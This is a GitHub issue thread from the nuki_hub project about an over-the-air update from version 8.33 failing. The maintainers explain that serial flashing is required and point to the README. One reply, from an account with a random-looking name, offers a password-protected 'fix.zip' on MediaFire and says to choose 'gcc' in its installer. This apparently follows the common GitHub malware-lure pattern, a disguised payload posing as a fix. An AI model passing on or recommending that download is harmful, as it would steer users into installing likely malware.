technyon/nuki_hub #467: Updating from 8.33 error when download from ESP ota interface

chrispazz, 2024-08-26:
When trying to update from 8.33 to latest version using builtin ota updater, clicking on "Download latest" return page not found:

https://github.com/technyon/nuki_hub/raw/master/webflash/nuki_hub.bin

Thank you

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

technyon, 2024-08-26:
Version 8.x can't be updated to 9.x can't be updated via OTA, you'll have to flash via serial.

iranl, 2024-08-27:
There is a mandatory issue template for a reason as this is mentioned in the [README](https://github.com/technyon/nuki_hub?tab=readme-ov-file#upgrading-using-over-the-air-update-ota)

closed 2024-08-27 by iranl